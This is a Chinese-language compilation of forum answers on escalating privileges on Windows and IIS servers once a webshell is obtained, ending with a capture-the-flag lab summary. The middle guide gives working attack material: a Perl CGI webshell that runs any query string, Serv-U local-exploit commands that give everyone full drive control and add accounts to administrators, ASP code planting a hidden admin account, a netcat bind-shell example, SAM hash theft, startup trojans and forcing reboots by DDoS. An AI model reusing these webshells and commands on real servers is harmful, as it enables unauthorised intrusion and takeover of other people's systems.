① Windows 7中怎麼在CMD下提權(以管理員許可權運行)
Windows 7中在CMD下提權(以管理員許可權運行)的步驟如下:
1.首先用快捷鍵,windows+R打開如下界面。輸入cmd,回車打開。
② 利用iis漏洞進行提權的功能是
1.利用IIS漏洞進行提權的工具是中國菜刀
2.本次iis6.exe提權是利用iis6.0遠程代碼執行漏洞獲取到一個Meterpreter之後,進行的提權。
③ 提權工具 是什麼意思
他是黑客 或者 說駭客 用來提升管理員許可權的工具 !
一般 入侵系統 首先得到的許可權是很普通的低級許可權賬戶
當然這樣的話 想做的事情就會受到許可權限制 而管理員賬戶是沒有任何限制的
所以 就要利用到一些提權工具來實現目的 !
④ 得到wedshell後怎麼提權啊
本篇文章結合了許多高手提升許可權的技巧和自己的一些想法
當我們取得一個webshell時候,下一部要做的就是提升許可權
個人總結如下:
1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能
否跳轉到這個目錄,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密碼,登陸
2.C:\WINNT\system32\config進這里下它的SAM,破解用戶的密碼
c:\winnt\repaire 下是備份
用到破解sam密碼的軟體有LC,SAMinside
3.C:\Documents and Settings\All Users\「開始」菜單\程序 看這里能跳轉不,我們從這里
可以獲取好多有用的信息
可以看見好多快捷方式,我們一般選擇Serv-U的,然後本地查看屬性,知道路徑後,看能否
跳轉
進去後,如果有許可權修改ServUDaemon.ini,加個用戶上去,密碼為空
[USER=dede|1]
Password=
HomeDir=c:
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
Access1=d:\|RWAMELCDP
Access1=f:\|RWAMELCDP
SKEYValues=
這個用戶具有最高許可權,然後我們就可以ftp上去 quote site exec xxx 來提升許可權
ServUAdmin.ini
ServUDaemon.ini
4.c:\winnt\system32\inetsrv\data就是這個目錄,同樣是erveryone 完全控制,我們所要做
的就是把提升許可權的工具上傳上去,然後執行
5.看能否跳轉到如下目錄
c:\php, 用phpspy
c:\prel,有時候不一定是這個目錄(同樣可以通過下載快捷方式看屬性獲知)用cgi的webshell
#!/usr/bin/perl
binmode(STDOUT);
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);
$_ = $ENV{QUERY_STRING};
s/%20/ /ig;
s/%2f/\//ig;
$execthis = $_;
syswrite(STDOUT, "<HTML><PRE>\r\n", 13);
open(STDERR, ">&STDOUT") || die "Can't redirect STDERR";
system($execthis);
syswrite(STDOUT, "\r\n</PRE></HTML>\r\n", 17);
close(STDERR);
close(STDOUT);
exit;
保存為cgi執行,
如果不行,可以試試 pl 擴展呢,把剛才的 cgi 文件改為 pl 文件,提交
http://anyhost//cmd.pl?dir
顯示"拒絕訪問",表示可以執行了!馬上提交:先的上傳個su.exe(ser-u提升許可權的工具)到
prel的bin目錄
http://anyhost//cmd.pl?c\perl\bin\su.exe
返回:
Serv-u >3.x Local Exploit by xiaolu
USAGE: serv-u.exe "command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
現在是 IUSR 許可權,提交:
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"
http://anyhost//cmd.pl?c\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"
如果返回下面的信息,就表示成功了
Serv-u >3.x Local Exploit by xiaolu
<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=2
<220 Domain settings saved
******************************************************
[+] Domain xl:2 Created
[+] Creating Evil User
<200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing: cacls.exe c: /E /T /G everyone:F
<220 Domain deleted
這樣所有分區為everyone完全控制
現在我們把自己的用戶提升為管理員:
http://anyhost//cmd.pl?c\perl\bin\su.exe " net localgroup administrators
IUSR_anyhost /add"
6.可以成功運行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get
w3svc/inprocessisapiapps"來提升許可權
用這個cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
查看有特權的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再將asp.dll加入特權一族
asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的機子放的位置不一定一樣)
我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32
\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32
\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32
\msw3prt.dll" "c:\winnt\system32\inetsrv\asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了
7.還可以用這段代碼試提升,好象效果不明顯
<%@codepage=936%><%Response.Expires=0
on error resume next
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.CreateObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.Create("user","WekweN$")
od.SetPassword "WekweN" <-----密碼
od.SetInfo
Set of=GetObject(oz&"/WekweN$,user")
oe.Add(of.ADsPath)
Response.write "WekweN$ 超級帳號建立成功!"%>
用這段代碼檢查是否提升成功
<%@codepage=936%>
<%Response.Expires=0
on error resume next \'查找Administrators組帳號
Set tN=server.CreateObject("Wscript.Network")
Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
For Each admin in objGroup.Members
Response.write admin.Name&"<br>"
Next
if err then
Response.write "不行啊:Wscript.Network"
end if
%>
8.C:\Program Files\Java Web Start這里如果可以,一般很小,可以嘗試用jsp的webshell,
聽說許可權很小,本人沒有遇見過。
9.最後了,如果主機設置很變態,可以試下在c:\Documents and Settings\All Users\「開始
」菜單\程序\啟動"寫入bat,vbs等木馬。
等到主機重啟或者你ddos逼它重啟,來達到許可權提升的目的。
總結起來說就是,找到有執行和寫入的目錄,管他什麼目錄,然後上傳提升工具,最後執行,
三個字"找" "上""執"
以上是本人的拙見,大家有什麼好的方法多多分享
⑤ windows靶場提權總結
最近做了幾個i春秋的靶場,從getshell到提權,練習的還是很全面的,這里主要對提權做個總結。
先從提權反推一下思路: 提權 -> 上傳提權工具 -> 找上傳點 -> 連接菜刀getshell -> 寫入或上傳一句話 -> 找到寫入點或上傳點
一句話的寫入點或上傳點大多都是在管理後台發現的,因為用戶的許可權較低,可以操作的功能也較少,而且對於用戶的輸入或上傳也有很嚴格的過濾機制,所以使用用戶許可權來寫入或上傳一句話的成功率很低。
那麼就需要登錄管理後台來寫入或上傳一句話,登錄管理後台有兩個條件: ①找到管理後台 。 ②拿到管理員賬號和密碼 (爆破也可以,但是成功率很低,這里就不多做討論了)。登錄進管理員後台後,就可以測試哪個地方可以利用,可以上傳或寫入一句話了。然後就是上面的一系列操作,最後拿到flag。
拿我做的這幾個靶場為例,首先打開瀏覽器看到頁面,發現都是一些CMS,從頁面信息可以知道CMS版本等信息,然後信息搜集看看這個版本之前有沒有爆出過漏洞,如果有SQL注入最好,可以嘗試通過注入拿到管理員賬號、密碼。當然也可以使用其他的方法,怎麼猥瑣怎麼來。
然後掃描目錄,如果管理員沒有修改CMS的默認目錄的話,管理後台還是很好掃出來的,如果修改過就比較困難了,就看你的字典強不強大了。當然也可以利用一些其他方法,比如信息泄露,如果是dedeCMS的話可以嘗試訪問 /data/mysqli_error_trace.inc 路徑或 /data/mysql_error_trace.inc 路徑,有可能會爆出後台路徑。
拿到賬號密碼和管理後台路徑後就可以登錄後台了,然後尋找哪個地方可以執行一句話,比如上傳圖片馬然後利用文件包含或解析漏洞執行一句話,或者試一下發表文章功能,試一下網站配置信息。反正姿勢越猥瑣越好。
拿到一句話的路徑後可以連菜刀了,連上菜刀後由於許可權問題,C盤一般是沒有讀寫許可權的,而大多數flag都放在C盤,所以我們就要找一個有上傳文件許可權的目錄上傳提權工具進行提權,這里著重總結兩種提權方法。
利用 CVE-2009-0079 的漏洞,工具: Churrasco.exe + cmd.exe + 3389.bat ,其中 cmd.exe 是為了代替原伺服器中許可權受限的命令行交互環境,Churrasco.exe 是用於提權的漏洞利用工具,3389.bat 是打開 3389 埠及遠程桌面服務的批處理腳本文件。
提權命令:
同樣是利用 CVE-2009-0079 的漏洞,工具: pr.exe + cmd.exe + 3389.bat ,與churrasco類似,命令和churrasco提權命令一樣,不過第一次輸入命令會報錯,再輸入一遍就好了。
iis.exe 與前兩者不同,是基於 CVE-2009-1535 漏洞的提權工具,工具: iis6.exe + cmd.exe + 3389.bat ,用法與前兩種工具類似,第一次創建用戶時也可能會報錯,若創建失敗,再次執行即可。
現在提權已經完成了,打開CMD輸入 mstsc 啟動遠程桌面登錄,輸入目標ip和剛才創建的用戶的登錄賬號密碼就可以遠程訪問伺服器了,然後進入C盤拿到flag即可。
參考鏈接:
【i春秋】滲透測試入門 —— 我很簡單,請不要欺負我